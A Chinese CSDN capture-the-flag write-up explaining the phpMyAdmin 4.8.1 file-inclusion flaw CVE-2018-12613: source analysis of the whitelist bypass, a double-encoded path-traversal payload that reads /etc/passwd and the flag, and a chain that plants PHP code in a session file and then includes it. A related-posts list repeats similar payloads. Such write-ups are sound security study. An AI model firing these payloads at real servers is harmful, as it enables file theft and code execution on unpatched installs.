[GWCTF 2019]我有一个数据库&CVE-2018-12613

最新推荐文章于 2023-09-15 16:40:06 发布
最新推荐文章于 2023-09-15 16:40:06 发布
阅读量765 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43801002/article/details/105787653
版权

#两道题用的都是]CVE-2018-12613这一个洞,所以就给写一起了。
1.审下源码吧
问题在index.php的55~63:

// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && ! preg_match('/^index/', $_REQUEST['target'])
    && ! in_array($_REQUEST['target'], $target_blacklist)
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target'];
    exit;
}

2.这里对于参数共有5个判断,判断通过就可以通过Include包含文件。

问题出在后两个上

$target_blacklist = array (
    'import.php', 'export.php'
);

3.以及
Core::checkPageValidity($_REQUEST[‘target’]):

代码在libraries\classes\Core.php的443~476:

public static function checkPageValidity(&$page, array $whitelist = [])
    {
        if (empty($whitelist)) {
            $whitelist = self::$goto_whitelist;
        }
        if (! isset($page) || !is_string($page)) {
            return false;
        }

        if (in_array($page, $whitelist)) {
            return true;
        }

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        return false;
    }

这跟上面的代码几乎是一个模子里刻出来的
4.之后phpMyAdmin的开发团队考虑到了target后面加参数的情况,通过字符串分割将问号的前面部分取出,继续匹配白名单,然后经过一遍urldecode后再重复动作。
payload如下

http://5cb93fd8-62f3-49f9-a5e9-d10f17c053b4.node3.buuoj.cn/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../etc/passwd

我们将后面换成/flag
即可查看位于根目录下的flag
image.png

#下面再说一下real题里面的这个洞
1.前面的过程都一样,一直到执行payload都是,只不过读取flag的方式不同,real类一般将flag放在php探针或者环境变量里面
2.image.png
之后执行

SELECT '<?php phpinfo()?>';

image.png
然后我们去触发这个探针就可以
3.执行命令的时候,我们的session会出现
image.png
然后访问

index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_44e2714bd7e701d92083eddfcd02e0d4

搜索flag即可

浩歌已行
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF[GWCTF 2019]我有一个数据库
LSYZWF的博客
10-12 1761
文章目录题目解答漏洞分析知识点 题目 链接:https://buuoj.cn/challenges#[GWCTF%202019]%E6%88%91%E6%9C%89%E4%B8%80%E4%B8%AA%E6%95%B0%E6%8D%AE%E5%BA%93 解答 1、乱码,看不懂 2、F12 同时结合题目可能与数据库有关 3、可以尝试扫描相关数据库的端口是否开放,也可以通过数据库工具进行连接测试,但是这里使用的是phpmyadmin 随便翻阅了一下,得不到有用的东西,也证实了上面什么都没有的说法 4、从
第三十九题——[GWCTF 2019]我有一个数据库
分享简单的安全技术
04-24 336
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,一堆乱码,使用diirsearch获取到了phpmyadmin这个目录 第二步:访问phpadmin目录,查看到了当前版本4.8.1,经查该版本有远程文件包含漏洞,与第一题漏洞一样 第三步:查看漏洞发现需要上传target参数且满足一定要求,构造:phpmyadmin/?target=db_sql.php?/../../../../../../flag获取flag ...
buuctf-[[GWCTF 2019]我有一个数据库(小宇特详解)
小宇的web博客
02-12 609
buuctf-[[GWCTF 2019]我有一个数据库(小宇特详解) 这里不知道什么原因显示的乱码 直接使用dirsearch对网站进行扫描吧 这里扫到了phpmyadmin目录,无密码直接登录成功。 这里给出了版本号MySQL数据库Version 4.8.1。 这个版本有文件包含漏洞 漏洞原理是 利用/使db_datadict.php?成为一个不存在目录,利用include函数的目录不断跳转尝试得到flag目录。 payload phpmyadmin/index.php?target=db_datadi
[GWCTF 2019]我有一个数据库 1
m0_62879498的博客
05-04 2526
[GWCTF 2019]我有一个数据库 1 打开环境 什么都没有 使用dirsearch爆破网站目录,发现了index.php,phpmyadmin, phpinofo以及root.txt 只有phpmyadmin提供了有用信息 我们访问一下 乍一看,感觉是毫无头绪 但,仔细观察 phpmyadmin 的版本信息 在该版本的 phpmyadmin 存在框架代码漏洞 $target_blacklist = array ( 'import.php', 'export.php' ); // If
BUU[GWCTF 2019]我有一个数据库
qq_62078839的博客
04-26 1834
打开链接 一堆乱码,查看源代码也没什么信息可提取,利用目录扫描器,看能不能扫出什么东西 扫到了一个phpmyadmin 进去看看 这里的版本号为4.8.1,而phpmyadmin在4.8.0以及4.8.1的版本号中有文件包含漏洞 [PHPMYADMIN]CVE-2018-12613 我们试试读取看是否成功 index.php?target=sql.php?/../../../../../../../../../etc/passwd 成功 尝试读取flag inde...
CVE-2018-18778.docx
07-23
总之,CVE-2018-18778是一个揭示了服务器软件安全设计重要性的实例。理解这个漏洞的工作原理有助于提高安全意识,确保网络服务的安全性。在日常运维中,定期评估和加固服务器配置,及时修补已知漏洞,是保障网络安全...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
3. CVE-2018-15919:这是一个输入验证错误,可能导致拒绝服务(DoS)攻击。当OpenSSH处理特殊构造的请求时,可能会耗尽系统资源,导致服务不可用。 为了修复这些漏洞,我们需要将OpenSSH升级到最新的稳定版本。在这...
CVE-2018-3191利用exp
01-08
标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...
weblogic10.36 CVE-2018-2893补丁文件
08-02
WebLogic(CVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。...
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT...
[GWCTF 2019]我有一个数据库
最新发布
siu~
09-15 177
[GWCTF 2019]我有一个数据库 解题
NO.2-6 [GWCTF 2019]我有一个数据库
nigo134的博客
07-26 179
该题考查cve-2018-12613-PhpMyadmin后台文件包含漏洞 使用御剑进行扫描发现phpmyadmin/目录,无需密码便可以进入 查看相关版本信息 百度一下发现phpmyadmin4.8.1版本文件包含漏洞,问题出在index.php的target参数位置 // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) &&amp..
[GWCTF 2019]我有一个数据库 wp
m0_55185160的博客
04-23 4378
得到了/phpmyadmin/路径,加上题目是我有一个数据库,于是想到应该本题就是和phpmyadmin数据库有关 我们可以看到phpmyadmin的版本为4.8.1,搜索后发现这个版本的phpmyadmin存在漏洞CVE-2018-12613,下面我们复现一下漏洞。 首先分析一下源码: index.php 关于target的部分 $target_blacklist = array ( 'imp..
BUU [GWCTF 2019]我有一个数据库
cadandme的博客
05-11 217
刷了一道web题,记录做题过程。 打开页面看到 打开源码,尝试解码。试了UTF-8,尝试把得到的数据导成文档。 结果是乱码,走入了死胡同。数据库数据库,又想到扫描目录,在kali扫描,发现东西 先看txt, 再看phpinfo.php 到这里彻底不懂了,瞎搞了没看出东西后,看了大佬的wp,说是phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) 后面跟着wp来,可惜在构造Pyaload使用时显示 index.php?target=db_sql.php%253f/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值